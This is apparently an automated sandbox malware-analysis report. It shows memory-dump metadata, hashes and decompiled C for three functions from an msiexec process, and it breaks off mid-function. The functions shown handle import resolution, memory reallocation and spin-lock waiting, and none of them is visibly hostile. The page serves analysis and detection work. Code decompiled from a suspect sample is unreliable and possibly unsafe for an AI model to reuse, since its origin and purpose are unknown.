Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$LocaleValid
String ID: en-US,en,
API String ID: 975949045-3579323720
Opcode ID: 61091d15e6526e1583efbb15f633f110e1cf18fdd83403f85958d083592ed0ba
Instruction ID: 50d655eb98b134ddc101041a23be4a59cbeff1d0f3d1ff336dbcb152460b3165
Opcode Fuzzy Hash: 61091d15e6526e1583efbb15f633f110e1cf18fdd83403f85958d083592ed0ba
Instruction Fuzzy Hash: 922193347402547BFA29BA789C16E2D21DADBCEB5CF51C9B1A081DB240DEA4FE01C766

Uniqueness

Uniqueness Score: -1.00%

Function 049E0EBC, Relevance: 13.8, APIs: 9, Instructions: 258
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E049E0EBC(void* __eflags, intOrPtr _a4, intOrPtr* _a8) {
				long _v8;
				signed int _v12;
				long _v16;
				void* _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				struct HINSTANCE__** _v48;
				CHAR* _v52;
				void _v56;
				long _v60;
				_Unknown_base(*)()* _v64;
				struct HINSTANCE__* _v68;
				CHAR* _v72;
				signed int _v76;
				CHAR* _v80;
				intOrPtr* _v84;
				void* _v88;
				void _v92;
				signed int _t104;
				signed int _t106;
				signed int _t108;
				long _t113;
				intOrPtr* _t119;
				void* _t124;
				void _t126;
				long _t128;
				struct HINSTANCE__* _t142;
				long _t166;
				signed int* _t190;
				_Unknown_base(*)()* _t191;
				void* _t194;
				intOrPtr _t196;

				_push(_a4);
				memcpy( &_v56, 0x4c80c54, 8 << 2);
				_pop(_t194);
				_v56 =  *0x4c80c54;
				_v52 = E049E136C( *0x04C80C58);
				_v48 = E049E137C( *0x04C80C5C);
				_v44 = E049E138C( *0x04C80C60);
				_v40 = E049E139C( *0x04C80C64);
				_v36 = E049E139C( *0x04C80C68);
				_v32 = E049E139C( *0x04C80C6C);
				_v28 =  *0x04C80C70;
				memcpy( &_v92, 0x4c80c74, 9 << 2);
				_t196 = _t194;
				_v88 = 0x4c80c74;
				_v84 = _a8;
				_v80 = _v52;
				if((_v56 & 0x00000001) == 0) {
					_t166 =  *0x4c80c98; // 0x0
					_v8 = _t166;
					_v8 =  &_v92;
					RaiseException(0xc06d0057, 0, 1,  &_v8);
					return 0;
				}
				_t104 = _a8 - _v44;
				_t142 =  *_v48;
				if(_t104 < 0) {
					_t104 = _t104 + 3;
				}
				_v12 = _t104 >> 2;
				_t106 = _v12;
				_t190 = (_t106 << 2) + _v40;
				_t108 = (_t106 & 0xffffff00 | (_t190[0] & 0x00000080) == 0x00000000) & 0x00000001;
				_v76 = _t108;
				if(_t108 == 0) {
					_v72 =  *_t190 & 0x0000ffff;
				} else {
					_v72 = E049E13AC( *_t190) + 2;
				}
				_t191 = 0;
				if( *0x4c93644 == 0) {
					L10:
					if(_t142 != 0) {
						L25:
						_v68 = _t142;
						if( *0x4c93644 != 0) {
							_t191 =  *0x4c93644(2,  &_v92);
						}
						if(_t191 != 0) {
							L36:
							if(_t191 == 0) {
								_v60 = GetLastError();
								if( *0x4c93648 != 0) {
									_t191 =  *0x4c93648(4,  &_v92);
								}
								if(_t191 == 0) {
									_t113 =  *0x4c80ca0; // 0x0
									_v24 = _t113;
									_v24 =  &_v92;
									RaiseException(0xc06d007f, 0, 1,  &_v24);
									_t191 = _v64;
								}
							}
							goto L41;
						} else {
							if( *((intOrPtr*)(_t196 + 0x14)) == 0 ||  *((intOrPtr*)(_t196 + 0x1c)) == 0) {
								L35:
								_t191 = GetProcAddress(_t142, _v72);
								goto L36;
							} else {
								_t119 =  *((intOrPtr*)(_t142 + 0x3c)) + _t142;
								if( *_t119 != 0x4550 ||  *((intOrPtr*)(_t119 + 8)) != _v28 || (( *(_t119 + 0x34) & 0xffffff00 |  *(_t119 + 0x34) == _t142) & 0x00000001) == 0) {
									goto L35;
								} else {
									_t191 =  *((intOrPtr*)(_v36 + _v12 * 4));
									if(_t191 == 0) {
										goto L35;
									}
									L41:
									 *_a8 = _t191;
									goto L42;
								}
							}
						}
					}
					if( *0x4c93644 != 0) {
						_t142 =  *0x4c93644(1,  &_v92);
					}
					if(_t142 == 0) {
						_t142 = LoadLibraryA(_v80);
					}
					if(_t142 != 0) {
						L20:
						if(_t142 == E049E07B4(_v48, _t142)) {
							FreeLibrary(_t142);
						} else {
							if( *((intOrPtr*)(_t196 + 0x18)) != 0) {
								_t124 = LocalAlloc(0x40, 8);
								_v20 = _t124;
								if(_t124 != 0) {
									 *((intOrPtr*)(_v20 + 4)) = _t196;
									_t126 =  *0x4c80c50; // 0x92e798
									 *_v20 = _t126;
									 *0x4c80c50 = _v20;
								}
							}
						}
						goto L25;
					} else {
						_v60 = GetLastError();
						if( *0x4c93648 != 0) {
							_t142 =  *0x4c93648(3,  &_v92);
						}
						if(_t142 != 0) {
							goto L20;
						} else {
							_t128 =  *0x4c80c9c; // 0x0
							_v16 = _t128;
							_v16 =  &_v92;
							RaiseException(0xc06d007e, 0, 1,  &_v16);
							return _v64;
						}
					}
				} else {
					_t191 =  *0x4c93644(0,  &_v92);
					if(_t191 == 0) {
						goto L10;
					} else {
						L42:
						if( *0x4c93644 != 0) {
							_v60 = 0;
							_v68 = _t142;
							_v64 = _t191;
							 *0x4c93644(5,  &_v92);
						}
						return _t191;
					}
				}
			}

0x049e0ed0
0x049e0ed6
0x049e0ed8
0x049e0edb
0x049e0ee8
0x049e0ef5
0x049e0f02
0x049e0f0f
0x049e0f1c
0x049e0f29
0x049e0f32
0x049e0f40
0x049e0f42
0x049e0f43
0x049e0f49
0x049e0f4f
0x049e0f56
0x049e0f58
0x049e0f5e
0x049e0f64
0x049e0f74
0x00000000
0x049e0f79
0x049e0f86
0x049e0f8b
0x049e0f8d
0x049e0f8f
0x049e0f8f
0x049e0f95
0x049e0f98
0x049e0fa0
0x049e0faa
0x049e0fad
0x049e0fb2
0x049e0fcd
0x049e0fb4
0x049e0fc0
0x049e0fc0
0x049e0fd0
0x049e0fd9
0x049e0ff2
0x049e0ff4
0x049e10b6
0x049e10b6
0x049e10c0
0x049e10ce
0x049e10ce
0x049e10d2
0x049e111f
0x049e1121
0x049e1128
0x049e1132
0x049e1140
0x049e1140
0x049e1144
0x049e1146
0x049e114b
0x049e1151
0x049e1161
0x049e1166
0x049e1166
0x049e1144
0x00000000
0x049e10d4
0x049e10d8
0x049e1113
0x049e111d
0x00000000
0x049e10e0
0x049e10e3
0x049e10eb
0x00000000
0x049e1104
0x049e110a
0x049e110f
0x00000000
0x00000000
0x049e1169
0x049e116c
0x00000000
0x049e116c
0x049e10eb
0x049e10d8
0x049e10d2
0x049e1001
0x049e100f
0x049e100f
0x049e1013
0x049e101e
0x049e101e
0x049e1022
0x049e106f
0x049e107b
0x049e10b1
0x049e107d
0x049e1081
0x049e1087
0x049e108c
0x049e1091
0x049e1098
0x049e109e
0x049e10a3
0x049e10a8
0x049e10a8
0x049e1091
0x049e1081
0x00000000
0x049e1024
0x049e1029
0x049e1033
0x049e1041
0x049e1041
0x049e1045
0x00000000
0x049e1047
0x049e1047
0x049e104c
0x049e1052
0x049e1062
0x00000000
0x049e1067
0x049e1045
0x049e0fdb
0x049e0fe7
0x049e0feb
0x00000000
0x049e0fed
0x049e116e
0x049e1175
0x049e1179
0x049e117c
0x049e117f
0x049e1188
0x049e1188
0x00000000
0x049e118e
0x049e0feb

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 049E0F74

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: a58e1f4b10bad2f965cfd8b7b7bb3efe3e06ef9406df2a141c5dcedd44bcc9ec
Instruction ID: 195506d393391bdc437aa69632d8339d5ce7ae40e7d8f0dd481dd746b9e152c9
Opcode Fuzzy Hash: a58e1f4b10bad2f965cfd8b7b7bb3efe3e06ef9406df2a141c5dcedd44bcc9ec
Instruction Fuzzy Hash: 4AA19075E00219AFDB26DFA9C885BBEB7B9FF88310F104529E505A7380DB75B944CB50

Uniqueness

Uniqueness Score: -1.00%

Function 049D5F10, Relevance: 10.9, APIs: 7, Instructions: 406
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E049D5F10(signed int __eax, intOrPtr __edx, void* __edi) {
				signed int __ebx;
				void* __esi;
				signed int _t69;
				signed int _t78;
				signed int _t93;
				long _t94;
				void* _t100;
				signed int _t102;
				signed int _t109;
				signed int _t115;
				signed int _t123;
				signed int _t129;
				void* _t131;
				signed int _t140;
				unsigned int _t148;
				signed int _t150;
				long _t152;
				signed int _t156;
				intOrPtr _t161;
				signed int _t166;
				signed int _t170;
				unsigned int _t171;
				intOrPtr _t174;
				intOrPtr _t192;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t205;
				unsigned int _t207;
				intOrPtr _t213;
				void* _t225;
				intOrPtr _t227;
				void* _t228;
				signed int _t230;
				void* _t232;
				signed int _t233;
				signed int _t234;
				signed int _t238;
				signed int _t241;
				void* _t243;
				intOrPtr* _t244;

				_t176 = __edx;
				_t66 = __eax;
				_t166 =  *(__eax - 4);
				_t217 = __eax;
				if((_t166 & 0x00000007) != 0) {
					__eflags = _t166 & 0x00000005;
					if((_t166 & 0x00000005) != 0) {
						_pop(_t217);
						_pop(_t145);
						__eflags = _t166 & 0x00000003;
						if((_t166 & 0x00000003) == 0) {
							_push(_t145);
							_push(__eax);
							_push(__edi);
							_push(_t225);
							_t244 = _t243 + 0xffffffe0;
							_t218 = __edx;
							_t202 = __eax;
							_t69 =  *(__eax - 4);
							_t148 = (0xfffffff0 & _t69) - 0x14;
							if(0xfffffff0 >= __edx) {
								__eflags = __edx - _t148 >> 1;
								if(__edx < _t148 >> 1) {
									_t150 = E049D5994(__edx);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t218 - 0x40a2c;
										if(_t218 > 0x40a2c) {
											_t78 = _t202 - 0x10;
											__eflags = _t78;
											 *((intOrPtr*)(_t78 + 8)) = _t218;
										}
										E049D5550(_t202, _t218, _t150);
										E049D5D18(_t202, _t202, _t225);
									}
								} else {
									_t150 = __eax;
									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
								}
							} else {
								if(0xfffffff0 <= __edx) {
									_t227 = __edx;
								} else {
									_t227 = 0xbadb9d;
								}
								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
									L12:
									_t150 = E049D5994(_t227);
									__eflags = _t150;
									if(_t150 != 0) {
										__eflags = _t227 - 0x40a2c;
										if(_t227 > 0x40a2c) {
											_t93 = _t150 - 0x10;
											__eflags = _t93;
											 *((intOrPtr*)(_t93 + 8)) = _t218;
										}
										E049D5520(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
										E049D5D18(_t202, _t202, _t227);
									}
								} else {
									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
									_t94 =  *(_t244 + 0x10);
									if(_t218 - _t148 >= _t94) {
										goto L12;
									} else {
										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
										if(_t94 < _t152) {
											_t152 = _t94;
										}
										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
											goto L12;
										} else {
											_t100 = _t202 - 0x10;
											 *((intOrPtr*)(_t100 + 8)) = _t218;
											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
											_t150 = _t202;
										}
									}
								}
							}
							return _t150;
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						_t170 = _t166 & 0xfffffff0;
						_push(__edi);
						_t205 = _t170 + __eax;
						_t171 = _t170 - 4;
						_t156 = _t166 & 0x0000000f;
						__eflags = __edx - _t171;
						_push(_t225);
						if(__edx > _t171) {
							_t102 =  *(_t205 - 4);
							__eflags = _t102 & 0x00000001;
							if((_t102 & 0x00000001) == 0) {
								L75:
								asm("adc edi, 0xffffffff");
								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
								_t207 = _t171;
								_t109 = E049D5994(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
								_t192 = _t176;
								__eflags = _t109;
								if(_t109 == 0) {
									goto L73;
								} else {
									__eflags = _t228 - 0x40a2c;
									if(_t228 > 0x40a2c) {
										 *((intOrPtr*)(_t109 - 8)) = _t192;
									}
									_t230 = _t109;
									E049D5520(_t217, _t207, _t109);
									E049D5D18(_t217, _t207, _t230);
									return _t230;
								}
							} else {
								_t115 = _t102 & 0xfffffff0;
								_t232 = _t171 + _t115;
								__eflags = __edx - _t232;
								if(__edx > _t232) {
									goto L75;
								} else {
									__eflags =  *0x4c9005d;
									if(__eflags == 0) {
										L66:
										__eflags = _t115 - 0xb30;
										if(_t115 >= 0xb30) {
											E049D556C(_t205);
											_t176 = _t176;
											_t171 = _t171;
										}
										asm("adc edi, 0xffffffff");
										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
										_t195 = _t232 + 4 - _t123;
										__eflags = _t195;
										if(_t195 > 0) {
											 *(_t217 + _t232 - 4) = _t195;
											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
											_t233 = _t123;
											__eflags = _t195 - 0xb30;
											if(_t195 >= 0xb30) {
												__eflags = _t123 + _t217;
												E049D55AC(_t123 + _t217, _t171, _t195);
											}
										} else {
											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
											_t233 = _t232 + 4;
										}
										_t234 = _t233 | _t156;
										__eflags = _t234;
										 *(_t217 - 4) = _t234;
										 *0x4c90aec = 0;
										_t109 = _t217;
										L73:
										return _t109;
									} else {
										while(1) {
											asm("lock cmpxchg [0x4c90aec], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4c9098d;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t176 = _t176;
												_t171 = _t171;
												asm("lock cmpxchg [0x4c90aec], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t176 = _t176;
													_t171 = _t171;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										_t129 =  *(_t205 - 4);
										__eflags = _t129 & 0x00000001;
										if((_t129 & 0x00000001) == 0) {
											L74:
											 *0x4c90aec = 0;
											goto L75;
										} else {
											_t115 = _t129 & 0xfffffff0;
											_t232 = _t171 + _t115;
											__eflags = _t176 - _t232;
											if(_t176 > _t232) {
												goto L74;
											} else {
												goto L66;
											}
										}
									}
								}
							}
						} else {
							__eflags = __edx + __edx - _t171;
							if(__edx + __edx < _t171) {
								__eflags = __edx - 0xb2c;
								if(__edx >= 0xb2c) {
									L41:
									_t32 = _t176 + 0xd3; // 0xbff
									_t238 = (_t32 & 0xffffff00) + 0x30;
									_t174 = _t171 + 4 - _t238;
									__eflags =  *0x4c9005d;
									if(__eflags != 0) {
										while(1) {
											asm("lock cmpxchg [0x4c90aec], ah");
											if(__eflags == 0) {
												break;
											}
											asm("pause");
											__eflags =  *0x4c9098d;
											if(__eflags != 0) {
												continue;
											} else {
												Sleep(0);
												_t174 = _t174;
												asm("lock cmpxchg [0x4c90aec], ah");
												if(__eflags != 0) {
													Sleep(0xa);
													_t174 = _t174;
													continue;
												}
											}
											break;
										}
										_t156 = 0x0000000f &  *(_t217 - 4);
										__eflags = 0xf;
									}
									 *(_t217 - 4) = _t156 | _t238;
									_t161 = _t174;
									_t196 =  *(_t205 - 4);
									__eflags = _t196 & 0x00000001;
									if((_t196 & 0x00000001) != 0) {
										_t131 = _t205;
										_t197 = _t196 & 0xfffffff0;
										_t161 = _t161 + _t197;
										_t205 = _t205 + _t197;
										__eflags = _t197 - 0xb30;
										if(_t197 >= 0xb30) {
											E049D556C(_t131);
										}
									} else {
										 *(_t205 - 4) = _t196 | 0x00000008;
									}
									 *((intOrPtr*)(_t205 - 8)) = _t161;
									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
									__eflags = _t161 - 0xb30;
									if(_t161 >= 0xb30) {
										E049D55AC(_t217 + _t238, _t174, _t161);
									}
									 *0x4c90aec = 0;
									return _t217;
								} else {
									__eflags = __edx - 0x2cc;
									if(__edx < 0x2cc) {
										_t213 = __edx;
										_t140 = E049D5994(__edx);
										__eflags = _t140;
										if(_t140 != 0) {
											_t241 = _t140;
											E049D5550(_t217, _t213, _t140);
											E049D5D18(_t217, _t213, _t241);
											_t140 = _t241;
										}
										return _t140;
									} else {
										_t176 = 0xb2c;
										__eflags = _t171 - 0xb2c;
										if(_t171 <= 0xb2c) {
											goto L37;
										} else {
											goto L41;
										}
									}
								}
							} else {
								L37:
								return _t66;
							}
						}
					}
				} else {
					__ebx =  *__ecx;
					__ecx =  *(__ebx + 2) & 0x0000ffff;
					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
					__eflags = __ecx - __edx;
					if(__ecx < __edx) {
						__ecx = __ecx + __ecx + 0x20;
						_push(__edi);
						__edi = __edx;
						__eax = 0;
						__ecx = __ecx - __edx;
						asm("adc eax, 0xffffffff");
						__eax = 0 & __ecx;
						__eax = (0 & __ecx) + __edx;
						__eax = E049D5994((0 & __ecx) + __edx);
						__eflags = __eax;
						if(__eax != 0) {
							__eflags = __edi - 0x40a2c;
							if(__edi > 0x40a2c) {
								 *(__eax - 8) = __edi;
							}
							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
							__edx = __eax;
							__edi = __eax;
							 *((intOrPtr*)(__ebx + 0x1c))() = E049D5D18(__esi, __edi, __ebp);
							__eax = __edi;
						}
						_pop(__edi);
						_pop(__esi);
						_pop(__ebx);
						return __eax;
					} else {
						__ebx = 0x40 + __edx * 4;
						__eflags = 0x40 + __edx * 4 - __ecx;
						if(0x40 + __edx * 4 < __ecx) {
							__ebx = __edx;
							__eax = __edx;
							__eax = E049D5994(__edx);
							__eflags = __eax;
							if(__eax != 0) {
								__ecx = __ebx;
								__edx = __eax;
								__ebx = __eax;
								__esi = E049D5D18(__esi, __edi, __ebp);
								__eax = __ebx;
							}
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						} else {
							_pop(__esi);
							_pop(__ebx);
							return __eax;
						}
					}
				}
			}

0x049d5f10
0x049d5f10
0x049d5f10
0x049d5f18
0x049d5f1a
0x049d5fa8
0x049d5fab
0x049d6218
0x049d6219
0x049d621a
0x049d621d
0x049d5848
0x049d5849
0x049d584a
0x049d584b
0x049d584c
0x049d584f
0x049d5851
0x049d5858
0x049d5861
0x049d5866
0x049d594d
0x049d594f
0x049d5962
0x049d5964
0x049d5966
0x049d5968
0x049d596e
0x049d5972
0x049d5972
0x049d5975
0x049d5975
0x049d597e
0x049d5985
0x049d5985
0x049d5951
0x049d5951
0x049d5956
0x049d5956
0x049d586c
0x049d5875
0x049d587b
0x049d5877
0x049d5877
0x049d5877
0x049d5887
0x049d5896
0x049d58a3
0x049d5913
0x049d591a
0x049d591c
0x049d591e
0x049d5920
0x049d5926
0x049d592a
0x049d592a
0x049d592d
0x049d592d
0x049d593d
0x049d5944
0x049d5944
0x049d58a5
0x049d58a5
0x049d58b1
0x049d58b7
0x00000000
0x049d58b9
0x049d58ca
0x049d58ce
0x049d58d0
0x049d58d0
0x049d58e6
0x00000000
0x049d58fe
0x049d5900
0x049d5903
0x049d590c
0x049d590f
0x049d590f
0x049d58e6
0x049d58b7
0x049d58a3
0x049d5993
0x049d6223
0x049d6223
0x049d6225
0x049d6225
0x049d5fb1
0x049d5fb3
0x049d5fb6
0x049d5fb7
0x049d5fba
0x049d5fbd
0x049d5fc0
0x049d5fc2
0x049d5fc3
0x049d60d8
0x049d60db
0x049d60dd
0x049d61d0
0x049d61db
0x049d61e2
0x049d61e4
0x049d61e7
0x049d61ec
0x049d61ed
0x049d61ef
0x00000000
0x049d61f1
0x049d61f1
0x049d61f7
0x049d61f9
0x049d61f9
0x049d61fc
0x049d6204
0x049d620b
0x049d6216
0x049d6216
0x049d60e3
0x049d60e3
0x049d60e6
0x049d60e9
0x049d60eb
0x00000000
0x049d60f1
0x049d60f1
0x049d60f8
0x049d6155
0x049d6155
0x049d615a
0x049d6160
0x049d6165
0x049d6166
0x049d6166
0x049d6172
0x049d6183
0x049d6189
0x049d6189
0x049d618b
0x049d6198
0x049d619f
0x049d61a3
0x049d61a5
0x049d61ab
0x049d61ad
0x049d61af
0x049d61af
0x049d618d
0x049d618d
0x049d6191
0x049d6191
0x049d61b4
0x049d61b4
0x049d61b6
0x049d61b9
0x049d61c0
0x049d61c2
0x049d61c6
0x049d60fa
0x049d60fa
0x049d60ff
0x049d6107
0x00000000
0x00000000
0x049d6109
0x049d610b
0x049d6112
0x00000000
0x049d6114
0x049d6118
0x049d611d
0x049d611e
0x049d6124
0x049d612c
0x049d6132
0x049d6137
0x049d6138
0x00000000
0x049d6138
0x049d612c
0x00000000
0x049d6112
0x049d6141
0x049d6144
0x049d6147
0x049d6149
0x049d61c9
0x049d61c9
0x00000000
0x049d614b
0x049d614b
0x049d614e
0x049d6151
0x049d6153
0x00000000
0x00000000
0x00000000
0x00000000
0x049d6153
0x049d6149
0x049d60f8
0x049d60eb
0x049d5fc9
0x049d5fcc
0x049d5fce
0x049d5fd8
0x049d5fde
0x049d5ff5
0x049d5ff5
0x049d6001
0x049d6007
0x049d6009
0x049d6010
0x049d6012
0x049d6017
0x049d601f
0x00000000
0x00000000
0x049d6021
0x049d6023
0x049d602a
0x00000000
0x049d602c
0x049d602f
0x049d6034
0x049d603a
0x049d6042
0x049d6047
0x049d604c
0x00000000
0x049d604c
0x049d6042
0x00000000
0x049d602a
0x049d6055
0x049d6055
0x049d6055
0x049d605a
0x049d605d
0x049d605f
0x049d6062
0x049d6065
0x049d6070
0x049d6072
0x049d6075
0x049d6077
0x049d6079
0x049d607f
0x049d6081
0x049d6081
0x049d6067
0x049d606a
0x049d606a
0x049d6086
0x049d608c
0x049d6090
0x049d6096
0x049d609d
0x049d609d
0x049d60a2
0x049d60af
0x049d5fe0
0x049d5fe0
0x049d5fe6
0x049d60b0
0x049d60b4
0x049d60b9
0x049d60bb
0x049d60bd
0x049d60c5
0x049d60cc
0x049d60d1
0x049d60d1
0x049d60d7
0x049d5fec
0x049d5fec
0x049d5ff1
0x049d5ff3
0x00000000
0x00000000
0x00000000
0x00000000
0x049d5ff3
0x049d5fe6
0x049d5fd0
0x049d5fd0
0x049d5fd4
0x049d5fd4
0x049d5fce
0x049d5fc3
0x049d5f20
0x049d5f20
0x049d5f22
0x049d5f26
0x049d5f29
0x049d5f2b
0x049d5f64
0x049d5f68
0x049d5f69
0x049d5f6b
0x049d5f6d
0x049d5f6f
0x049d5f72
0x049d5f74
0x049d5f76
0x049d5f7b
0x049d5f7d
0x049d5f7f
0x049d5f85
0x049d5f87
0x049d5f87
0x049d5f8e
0x049d5f8e
0x049d5f91
0x049d5f93
0x049d5f9c
0x049d5fa1
0x049d5fa1
0x049d5fa3
0x049d5fa4
0x049d5fa5
0x049d5fa6
0x049d5f2d
0x049d5f2d
0x049d5f34
0x049d5f36
0x049d5f3c
0x049d5f3e
0x049d5f40
0x049d5f45
0x049d5f47
0x049d5f49
0x049d5f4b
0x049d5f4d
0x049d5f58
0x049d5f5d
0x049d5f5d
0x049d5f5f
0x049d5f60
0x049d5f61
0x049d5f38
0x049d5f38
0x049d5f39
0x049d5f3a
0x049d5f3a
0x049d5f36
0x049d5f2b

Memory Dump Source

Source File: 00000004.00000002.898496674.00000000049D1000.00000020.00020000.sdmp, Offset: 049D0000, based on PE: true

Associated: 00000004.00000002.898412640.00000000049D0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899079253.0000000004C80000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899090087.0000000004C87000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899099871.0000000004C8B000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899109421.0000000004C8C000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899121700.0000000004C8E000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899147930.0000000004C95000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899162929.0000000004C9A000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.899179058.0000000004C9C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.899187456.0000000004C9D000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.899195944.0000000004C9F000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_49d0000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09b09c0e661e1b827842d19a24f771257df1c2d0b7bac7539bfe3ace1ec0d994
Instruction ID: 86b088e7eafbeed6f9d39e5997bca8d135c8a0b91a59b0aed11fcb640c4c4f2b
Opcode Fuzzy Hash: 09b09c0e661e1b827842d19a24f771257df1c2d0b7bac7539bfe3ace1ec0d994
Instruction Fuzzy Hash: A1C157627106012BE715AE7DDC8476EB38ADBC4335F5AC63EE254CB389EA78EC458350

Uniqueness

Uniqueness Score: -1.00%

Function 049D8ABC, Relevance: 10.6, APIs: 7, Instructions: 130
threadCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E049D8ABC(signed char* __eax, void* __edx, void* __eflags) {
				void* _t49;
				signed char _t56;
				intOrPtr _t57;
				signed char _t59;
				void* _t70;
				signed char* _t71;
				intOrPtr _t72;
				signed char* _t73;

				_t70 = __edx;
				_t71 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x10));
				while(1) {
					L1:
					 *_t73 = E049D8F7C(_t71);
					if( *_t73 != 0 || _t70 == 0) {
						break;
					}
					_t73[1] = 0;
					if(_t72 <= 0) {
						while(1) {
							L17:
							_t56 =  *_t71;
							if(_t56 == 0) {
								goto L1;
							}
							asm("lock cmpxchg [esi], edx");
							if(_t56 != _t56) {
								continue;
							} else {
								goto L19;
							}
							do {
								L19:
								_t73[4] = GetTickCount();
								E049D8CC0(_t71);
								_t57 =  *0x4c908fc; // 0x4c826d4
								 *((intOrPtr*)(_t57 + 0x10))();
								 *_t73 = 0 == 0;
								if(_t70 != 0xffffffff) {
									_t73[8] = GetTickCount();
									if(_t70 <= _t73[8] - _t73[4]) {
										_t70 = 0;
									} else {
										_t70 = _t70 - _t73[8] - _t73[4];
									}
								}
								if( *_t73 == 0) {
									do {
										asm("lock cmpxchg [esi], edx");
									} while ( *_t71 !=  *_t71);
									_t73[1] = 1;
								} else {
									while(1) {
										_t59 =  *_t71;
										if((_t59 & 0x00000001) != 0) {
											goto L29;
										}
										asm("lock cmpxchg [esi], edx");
										if(_t59 != _t59) {
											continue;
										}
										_t73[1] = 1;
										goto L29;
									}
								}
								L29:
							} while (_t73[1] == 0);
							if( *_t73 != 0) {
								_t71[8] = GetCurrentThreadId();
								_t71[4] = 1;
							}
							goto L32;
						}
						continue;
					}
					_t73[4] = GetTickCount();
					_t73[0xc] = 0;
					if(_t72 <= 0) {
						L13:
						if(_t70 == 0xffffffff) {
							goto L17;
						}
						_t73[8] = GetTickCount();
						_t49 = _t73[8] - _t73[4];
						if(_t70 > _t49) {
							_t70 = _t70 - _t49;
							goto L17;
						}
						 *_t73 = 0;
						break;
					}
					L5:
					L5:
					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
						goto L8;
					} else {
						 *_t73 = 0;
					}
					break;
					L8:
